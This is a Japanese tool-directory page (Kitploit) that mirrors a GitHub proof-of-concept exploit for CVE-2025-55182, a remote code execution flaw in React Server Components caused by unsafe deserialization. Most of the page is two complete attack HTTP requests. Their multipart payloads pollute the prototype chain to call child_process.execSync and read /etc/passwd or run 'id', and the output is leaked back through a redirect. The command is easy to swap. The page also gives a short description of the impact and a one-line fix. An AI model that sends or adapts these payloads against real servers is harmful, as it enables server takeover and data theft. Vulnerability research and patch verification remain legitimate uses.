Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
React2Shell_cve-2025-55182 — CVE-2025-55182の概念実証エクスプロイト。React Server Componentsにおける安全でないリクエストのデシリアライゼーションを介したリモートコード実行を実証します。ペネトレーションテスト用に細工されたHTTPリクエストを含みます。 | Kitploit
ツール/GitHubGitHub/ethicalrohitt/react2shell_cve-2025-55182
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubethicalrohitt/react2shell_cve-2025-55182

React2Shell_cve-2025-55182

CVE-2025-55182の概念実証エクスプロイト。React Server Componentsにおける安全でないリクエストのデシリアライゼーションを介したリモートコード実行を実証します。ペネトレーションテスト用に細工されたHTTPリクエストを含みます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

React Server Components RCE - CVE-2025-55182

こんにちは!素晴らしい一日をお過ごしのことと思います!😊✨

これは何についてですか?

React Server Components のバージョン 19.0.0、19.1.0、19.1.1、19.2.0 には深刻なセキュリティ問題があります。影響を受けるパッケージは react-server-dom-parcel、react-server-dom-turbopack、react-server-dom-webpack です。

この問題は、サーバーがリクエストから安全でない方法でデータを読み取るときに発生します。攻撃者は、サーバーに任意のコマンドを実行させる特別なデータを送信できます。


概念実証 - 完全な攻撃例

問題を示す完全な攻撃リクエストを以下に示します。コマンドは安全な例に変更しています。

target-website.com をテスト対象のウェブサイトに置き換えてください。

攻撃リクエスト #1 - システムファイルの読み取り

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

攻撃リクエスト #2 - ユーザー情報の確認

root@kitploit:~
POST / HTTP/1.1
Host: target-website.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

簡単な説明

  1. サーバーがリクエストからデータを読み取る
  2. 悪意のあるデータがサーバーを騙してコマンドを実行させる
  3. 攻撃者は任意のコマンドを実行できる
  4. コマンドは送信データ内に隠されている

何が起こり得るか?

攻撃者は以下のことが可能です:

  • サーバー上で任意のコマンドを実行
  • 秘密ファイルを読み取る
  • サーバーを制御する
  • すべてのデータを盗む

修正方法

すぐに React をアップデートしてください! この問題が修正された最新バージョンを入手してください。


参考リンク

  • 公式スキャナーツール
  • 技術詳細
  • Facebook セキュリティ通知
  • OpenWall セキュリティリスト
  • React 公式ブログ
  • Next.js セキュリティ通知
  • Vercel アップデート通知

お気をつけて、ご安全にお過ごしください!✨❤️

ツールをダウンロード